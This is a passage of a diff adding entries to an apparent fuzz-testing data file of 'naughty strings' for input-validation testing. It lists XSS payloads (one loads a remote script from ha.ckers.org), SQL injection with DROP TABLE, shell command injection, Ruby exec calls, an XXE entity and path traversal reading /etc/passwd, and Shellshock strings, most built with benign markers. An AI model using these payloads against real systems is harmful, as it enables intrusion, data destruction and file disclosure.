+    "base64": "PGltZyBceDQ3c3JjPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxNzUpIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img \\x34src=x onerror=\"javascript:alert(176)\">",
+    "base64": "PGltZyBceDM0c3JjPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxNzYpIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img \\x39src=x onerror=\"javascript:alert(177)\">",
+    "base64": "PGltZyBceDM5c3JjPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxNzcpIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img \\x00src=x onerror=\"javascript:alert(178)\">",
+    "base64": "PGltZyBceDAwc3JjPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxNzgpIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src\\x09=x onerror=\"javascript:alert(179)\">",
+    "base64": "PGltZyBzcmNceDA5PXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxNzkpIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src\\x10=x onerror=\"javascript:alert(180)\">",
+    "base64": "PGltZyBzcmNceDEwPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxODApIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src\\x13=x onerror=\"javascript:alert(181)\">",
+    "base64": "PGltZyBzcmNceDEzPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxODEpIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src\\x32=x onerror=\"javascript:alert(182)\">",
+    "base64": "PGltZyBzcmNceDMyPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxODIpIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src\\x12=x onerror=\"javascript:alert(183)\">",
+    "base64": "PGltZyBzcmNceDEyPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxODMpIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src\\x11=x onerror=\"javascript:alert(184)\">",
+    "base64": "PGltZyBzcmNceDExPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxODQpIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src\\x00=x onerror=\"javascript:alert(185)\">",
+    "base64": "PGltZyBzcmNceDAwPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxODUpIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src\\x47=x onerror=\"javascript:alert(186)\">",
+    "base64": "PGltZyBzcmNceDQ3PXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxODYpIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=x\\x09onerror=\"javascript:alert(187)\">",
+    "base64": "PGltZyBzcmM9eFx4MDlvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDE4NykiPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=x\\x10onerror=\"javascript:alert(188)\">",
+    "base64": "PGltZyBzcmM9eFx4MTBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDE4OCkiPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=x\\x11onerror=\"javascript:alert(189)\">",
+    "base64": "PGltZyBzcmM9eFx4MTFvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDE4OSkiPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=x\\x12onerror=\"javascript:alert(190)\">",
+    "base64": "PGltZyBzcmM9eFx4MTJvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDE5MCkiPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=x\\x13onerror=\"javascript:alert(191)\">",
+    "base64": "PGltZyBzcmM9eFx4MTNvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDE5MSkiPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(192)\">",
+    "base64": "PGltZ1thXVtiXVtjXXNyY1tkXT14W2Vdb25lcnJvcj1bZl0iYWxlcnQoMTkyKSI+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=x onerror=\\x09\"javascript:alert(193)\">",
+    "base64": "PGltZyBzcmM9eCBvbmVycm9yPVx4MDkiamF2YXNjcmlwdDphbGVydCgxOTMpIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=x onerror=\\x10\"javascript:alert(194)\">",
+    "base64": "PGltZyBzcmM9eCBvbmVycm9yPVx4MTAiamF2YXNjcmlwdDphbGVydCgxOTQpIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=x onerror=\\x11\"javascript:alert(195)\">",
+    "base64": "PGltZyBzcmM9eCBvbmVycm9yPVx4MTEiamF2YXNjcmlwdDphbGVydCgxOTUpIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=x onerror=\\x12\"javascript:alert(196)\">",
+    "base64": "PGltZyBzcmM9eCBvbmVycm9yPVx4MTIiamF2YXNjcmlwdDphbGVydCgxOTYpIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=x onerror=\\x32\"javascript:alert(197)\">",
+    "base64": "PGltZyBzcmM9eCBvbmVycm9yPVx4MzIiamF2YXNjcmlwdDphbGVydCgxOTcpIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=x onerror=\\x00\"javascript:alert(198)\">",
+    "base64": "PGltZyBzcmM9eCBvbmVycm9yPVx4MDAiamF2YXNjcmlwdDphbGVydCgxOTgpIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(199)>XXX</a>",
+    "base64": "PGEgaHJlZj1qYXZhJiMxJiMyJiMzJiM0JiM1JiM2JiM3JiM4JiMxMSYjMTJzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxOTkpPlhYWDwvYT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=\"x` `<script>javascript:alert(200)</script>\"` `>",
+    "base64": "PGltZyBzcmM9InhgIGA8c2NyaXB0PmphdmFzY3JpcHQ6YWxlcnQoMjAwKTwvc2NyaXB0PiJgIGA+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src onerror /\" '\"= alt=javascript:alert(201)//\">",
+    "base64": "PGltZyBzcmMgb25lcnJvciAvIiAnIj0gYWx0PWphdmFzY3JpcHQ6YWxlcnQoMjAxKS8vIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<title onpropertychange=javascript:alert(202)></title><title title=>",
+    "base64": "PHRpdGxlIG9ucHJvcGVydHljaGFuZ2U9amF2YXNjcmlwdDphbGVydCgyMDIpPjwvdGl0bGU+PHRpdGxlIHRpdGxlPT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(203)></a>\">",
+    "base64": "PGEgaHJlZj1odHRwOi8vZm9vLmJhci8jeD1geT48L2E+PGltZyBhbHQ9ImA+PGltZyBzcmM9eDp4IG9uZXJyb3I9amF2YXNjcmlwdDphbGVydCgyMDMpPjwvYT4iPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<!--[if]><script>javascript:alert(204)</script -->",
+    "base64": "PCEtLVtpZl0+PHNjcmlwdD5qYXZhc2NyaXB0OmFsZXJ0KDIwNCk8L3NjcmlwdCAtLT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<!--[if<img src=x onerror=javascript:alert(205)//]> -->",
+    "base64": "PCEtLVtpZjxpbWcgc3JjPXggb25lcnJvcj1qYXZhc2NyaXB0OmFsZXJ0KDIwNSkvL10+IC0tPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<script src=\"/\\%(jscript)s\"></script>",
+    "base64": "PHNjcmlwdCBzcmM9Ii9cJShqc2NyaXB0KXMiPjwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<script src=\"\\\\%(jscript)s\"></script>",
+    "base64": "PHNjcmlwdCBzcmM9IlxcJShqc2NyaXB0KXMiPjwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG \"\"\"><SCRIPT>alert(\"206\")</SCRIPT>\">",
+    "base64": "PElNRyAiIiI+PFNDUklQVD5hbGVydCgiMjA2Iik8L1NDUklQVD4iPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC=javascript:alert(String.fromCharCode(50,48,55))>",
+    "base64": "PElNRyBTUkM9amF2YXNjcmlwdDphbGVydChTdHJpbmcuZnJvbUNoYXJDb2RlKDUwLDQ4LDU1KSk+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC=# onmouseover=\"alert('208')\">",
+    "base64": "PElNRyBTUkM9IyBvbm1vdXNlb3Zlcj0iYWxlcnQoJzIwOCcpIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC= onmouseover=\"alert('209')\">",
+    "base64": "PElNRyBTUkM9IG9ubW91c2VvdmVyPSJhbGVydCgnMjA5JykiPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG onmouseover=\"alert('210')\">",
+    "base64": "PElNRyBvbm1vdXNlb3Zlcj0iYWxlcnQoJzIxMCcpIj4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#50;&#49;&#49;&#39;&#41;>",
+    "base64": "PElNRyBTUkM9JiMxMDY7JiM5NzsmIzExODsmIzk3OyYjMTE1OyYjOTk7JiMxMTQ7JiMxMDU7JiMxMTI7JiMxMTY7JiM1ODsmIzk3OyYjMTA4OyYjMTAxOyYjMTE0OyYjMTE2OyYjNDA7JiMzOTsmIzUwOyYjNDk7JiM0OTsmIzM5OyYjNDE7Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000050&#0000049&#0000050&#0000039&#0000041>",
+    "base64": "PElNRyBTUkM9JiMwMDAwMTA2JiMwMDAwMDk3JiMwMDAwMTE4JiMwMDAwMDk3JiMwMDAwMTE1JiMwMDAwMDk5JiMwMDAwMTE0JiMwMDAwMTA1JiMwMDAwMTEyJiMwMDAwMTE2JiMwMDAwMDU4JiMwMDAwMDk3JiMwMDAwMTA4JiMwMDAwMTAxJiMwMDAwMTE0JiMwMDAwMTE2JiMwMDAwMDQwJiMwMDAwMDM5JiMwMDAwMDUwJiMwMDAwMDQ5JiMwMDAwMDUwJiMwMDAwMDM5JiMwMDAwMDQxPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x32&#x31&#x33&#x27&#x29>",
+    "base64": "PElNRyBTUkM9JiN4NkEmI3g2MSYjeDc2JiN4NjEmI3g3MyYjeDYzJiN4NzImI3g2OSYjeDcwJiN4NzQmI3gzQSYjeDYxJiN4NkMmI3g2NSYjeDcyJiN4NzQmI3gyOCYjeDI3JiN4MzImI3gzMSYjeDMzJiN4MjcmI3gyOT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC=\"jav   ascript:alert('214');\">",
+    "base64": "PElNRyBTUkM9ImphdiDCoCBhc2NyaXB0OmFsZXJ0KCcyMTQnKTsiPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC=\"jav&#x09;ascript:alert('215');\">",
+    "base64": "PElNRyBTUkM9ImphdiYjeDA5O2FzY3JpcHQ6YWxlcnQoJzIxNScpOyI+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC=\"jav&#x0A;ascript:alert('216');\">",
+    "base64": "PElNRyBTUkM9ImphdiYjeDBBO2FzY3JpcHQ6YWxlcnQoJzIxNicpOyI+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC=\"jav&#x0D;ascript:alert('217');\">",
+    "base64": "PElNRyBTUkM9ImphdiYjeDBEO2FzY3JpcHQ6YWxlcnQoJzIxNycpOyI+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "perl -e 'print \"<IMG SRC=java\\0script:alert(\\\"218\\\")>\";' > out",
+    "base64": "cGVybCAtZSAncHJpbnQgIjxJTUcgU1JDPWphdmFcMHNjcmlwdDphbGVydChcIjIxOFwiKT4iOycgPiBvdXQ="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC=\" &#14;  javascript:alert('219');\">",
+    "base64": "PElNRyBTUkM9IiAmIzE0OyDCoGphdmFzY3JpcHQ6YWxlcnQoJzIxOScpOyI+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
+    "base64": "PFNDUklQVC9YU1MgU1JDPSJodHRwOi8vaGEuY2tlcnMub3JnL3hzcy5qcyI+PC9TQ1JJUFQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"220\")>",
+    "base64": "PEJPRFkgb25sb2FkISMkJSYoKSp+Ky1fLiw6Oz9AWy98XF1eYD1hbGVydCgiMjIwIik+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
+    "base64": "PFNDUklQVC9TUkM9Imh0dHA6Ly9oYS5ja2Vycy5vcmcveHNzLmpzIj48L1NDUklQVD4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<<SCRIPT>alert(\"221\");//<</SCRIPT>",
+    "base64": "PDxTQ1JJUFQ+YWxlcnQoIjIyMSIpOy8vPDwvU0NSSVBUPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >",
+    "base64": "PFNDUklQVCBTUkM9aHR0cDovL2hhLmNrZXJzLm9yZy94c3MuanM/PCBCID4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<SCRIPT SRC=//ha.ckers.org/.j>",
+    "base64": "PFNDUklQVCBTUkM9Ly9oYS5ja2Vycy5vcmcvLmo+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC=\"javascript:alert('222')\"",
+    "base64": "PElNRyBTUkM9ImphdmFzY3JpcHQ6YWxlcnQoJzIyMicpIg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<iframe src=http://ha.ckers.org/scriptlet.html <",
+    "base64": "PGlmcmFtZSBzcmM9aHR0cDovL2hhLmNrZXJzLm9yZy9zY3JpcHRsZXQuaHRtbCA8"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\\\";alert('223');//",
+    "base64": "XCI7YWxlcnQoJzIyMycpOy8v"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<u oncopy=alert()> Copy me</u>",
+    "base64": "PHUgb25jb3B5PWFsZXJ0KCk+IENvcHkgbWU8L3U+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<i onwheel=alert(224)> Scroll over me </i>",
+    "base64": "PGkgb253aGVlbD1hbGVydCgyMjQpPiBTY3JvbGwgb3ZlciBtZSA8L2k+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<plaintext>",
+    "base64": "PHBsYWludGV4dD4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "http://a/%%30%30",
+    "base64": "aHR0cDovL2EvJSUzMCUzMA=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "</textarea><script>alert(225)</script>",
+    "base64": "PC90ZXh0YXJlYT48c2NyaXB0PmFsZXJ0KDIyNSk8L3NjcmlwdD4="
+  },
+  {
+    "category": "Strings which can cause a SQL injection if inputs are not sanitized",
+    "string": "1;DROP TABLE users",
+    "base64": "MTtEUk9QIFRBQkxFIHVzZXJz"
+  },
+  {
+    "category": "Strings which can cause a SQL injection if inputs are not sanitized",
+    "string": "1'; DROP TABLE users-- 1",
+    "base64": "MSc7IERST1AgVEFCTEUgdXNlcnMtLSAx"
+  },
+  {
+    "category": "Strings which can cause a SQL injection if inputs are not sanitized",
+    "string": "' OR 1=1 -- 1",
+    "base64": "JyBPUiAxPTEgLS0gMQ=="
+  },
+  {
+    "category": "Strings which can cause a SQL injection if inputs are not sanitized",
+    "string": "' OR '1'='1",
+    "base64": "JyBPUiAnMSc9JzE="
+  },
+  {
+    "category": "Strings which can cause a SQL injection if inputs are not sanitized",
+    "string": "'; EXEC sp_MSForEachTable 'DROP TABLE ?'; --",
+    "base64": "JzsgRVhFQyBzcF9NU0ZvckVhY2hUYWJsZSAnRFJPUCBUQUJMRSA/JzsgLS0="
+  },
+  {
+    "category": "Strings which can cause a SQL injection if inputs are not sanitized",
+    "string": "%",
+    "base64": "JQ=="
+  },
+  {
+    "category": "Strings which can cause a SQL injection if inputs are not sanitized",
+    "string": "_",
+    "base64": "Xw=="
+  },
+  {
+    "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+    "string": "-",
+    "base64": "LQ=="
+  },
+  {
+    "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+    "string": "--",
+    "base64": "LS0="
+  },
+  {
+    "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+    "string": "--version",
+    "base64": "LS12ZXJzaW9u"
+  },
+  {
+    "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+    "string": "--help",
+    "base64": "LS1oZWxw"
+  },
+  {
+    "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+    "string": "$USER",
+    "base64": "JFVTRVI="
+  },
+  {
+    "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+    "string": "/dev/null; touch /tmp/blns.fail ; echo",
+    "base64": "L2Rldi9udWxsOyB0b3VjaCAvdG1wL2JsbnMuZmFpbCA7IGVjaG8="
+  },
+  {
+    "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+    "string": "`touch /tmp/blns.fail`",
+    "base64": "YHRvdWNoIC90bXAvYmxucy5mYWlsYA=="
+  },
+  {
+    "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+    "string": "$(touch /tmp/blns.fail)",
+    "base64": "JCh0b3VjaCAvdG1wL2JsbnMuZmFpbCk="
+  },
+  {
+    "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+    "string": "@{[system \"touch /tmp/blns.fail\"]}",
+    "base64": "QHtbc3lzdGVtICJ0b3VjaCAvdG1wL2JsbnMuZmFpbCJdfQ=="
+  },
+  {
+    "category": "Strings which can call system commands within Ruby/Rails applications",
+    "string": "eval(\"puts 'hello world'\")",
+    "base64": "ZXZhbCgicHV0cyAnaGVsbG8gd29ybGQnIik="
+  },
+  {
+    "category": "Strings which can call system commands within Ruby/Rails applications",
+    "string": "System(\"ls -al /\")",
+    "base64": "U3lzdGVtKCJscyAtYWwgLyIp"
+  },
+  {
+    "category": "Strings which can call system commands within Ruby/Rails applications",
+    "string": "`ls -al /`",
+    "base64": "YGxzIC1hbCAvYA=="
+  },
+  {
+    "category": "Strings which can call system commands within Ruby/Rails applications",
+    "string": "Kernel.exec(\"ls -al /\")",
+    "base64": "S2VybmVsLmV4ZWMoImxzIC1hbCAvIik="
+  },
+  {
+    "category": "Strings which can call system commands within Ruby/Rails applications",
+    "string": "Kernel.exit(1)",
+    "base64": "S2VybmVsLmV4aXQoMSk="
+  },
+  {
+    "category": "Strings which can call system commands within Ruby/Rails applications",
+    "string": "%x('ls -al /')",
+    "base64": "JXgoJ2xzIC1hbCAvJyk="
+  },
+  {
+    "category": "String which can reveal system files when parsed by a badly configured XML parser",
+    "string": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>",
+    "base64": "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWyA8IUVMRU1FTlQgZm9vIEFOWSA+PCFFTlRJVFkgeHhlIFNZU1RFTSAiZmlsZTovLy9ldGMvcGFzc3dkIiA+XT48Zm9vPiZ4eGU7PC9mb28+"
+  },
+  {
+    "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+    "string": "$HOME",
+    "base64": "JEhPTUU="
+  },
+  {
+    "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+    "string": "$ENV{'HOME'}",
+    "base64": "JEVOVnsnSE9NRSd9"
+  },
+  {
+    "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+    "string": "%d",
+    "base64": "JWQ="
+  },
+  {
+    "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+    "string": "%s%s%s%s%s",
+    "base64": "JXMlcyVzJXMlcw=="
+  },
+  {
+    "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+    "string": "{0}",
+    "base64": "ezB9"
+  },
+  {
+    "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+    "string": "%*.*s",
+    "base64": "JSouKnM="
+  },
+  {
+    "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+    "string": "%@",
+    "base64": "JUA="
+  },
+  {
+    "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+    "string": "%n",
+    "base64": "JW4="
+  },
+  {
+    "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+    "string": "File:///",
+    "base64": "RmlsZTovLy8="
+  },
+  {
+    "category": "Strings which can cause user to pull in files that should not be a part of a web server",
+    "string": "../../../../../../../../../../../etc/passwd%00",
+    "base64": "Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA=="
+  },
+  {
+    "category": "Strings which can cause user to pull in files that should not be a part of a web server",
+    "string": "../../../../../../../../../../../etc/hosts",
+    "base64": "Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2hvc3Rz"
+  },
+  {
+    "category": "Strings that test for known vulnerabilities",
+    "string": "() { 0; }; touch /tmp/blns.shellshock1.fail;",
+    "base64": "KCkgeyAwOyB9OyB0b3VjaCAvdG1wL2JsbnMuc2hlbGxzaG9jazEuZmFpbDs="
+  },
+  {
+    "category": "Strings that test for known vulnerabilities",
+    "string": "() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }",
+    "base64": "KCkgeyBfOyB9ID5fWyQoJCgpKV0geyB0b3VjaCAvdG1wL2JsbnMuc2hlbGxzaG9jazIuZmFpbDsgfQ=="
+  },
+  {
+    "category": "Strings that test for known vulnerabilities",
+    "string": "<<< %s(un='%s') = %u",
+    "base64": "PDw8ICVzKHVuPSclcycpID0gJXU="
+  },
+  {
+    "category": "Strings that test for known vulnerabilities",
+    "string": "+++ATH0",
+    "base64": "KysrQVRIMA=="
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "CON",
+    "base64": "Q09O"
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "PRN",
+    "base64": "UFJO"
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "AUX",
+    "base64": "QVVY"
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "CLOCK$",
+    "base64": "Q0xPQ0sk"
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "NUL",
+    "base64": "TlVM"
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "A:",
+    "base64": "QTo="
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "ZZ:",
+    "base64": "Wlo6"
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "COM1",
+    "base64": "Q09NMQ=="
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "LPT1",
+    "base64": "TFBUMQ=="
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "LPT2",
+    "base64": "TFBUMg=="
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "LPT3",
+    "base64": "TFBUMw=="
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "COM2",
+    "base64": "Q09NMg=="
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "COM3",
+    "base64": "Q09NMw=="
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "COM4",
+    "base64": "Q09NNA=="
+  },
+  {
+    "category": "Strings that may occur on IRC clients that make security products freak out",
+    "string": "DCC SEND STARTKEYLOGGER 0 0 0",
+    "base64": "RENDIFNFTkQgU1RBUlRLRVlMT0dHRVIgMCAwIDA="
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Scunthorpe General Hospital",
+    "base64": "U2N1bnRob3JwZSBHZW5lcmFsIEhvc3BpdGFs"
+  },
+  {
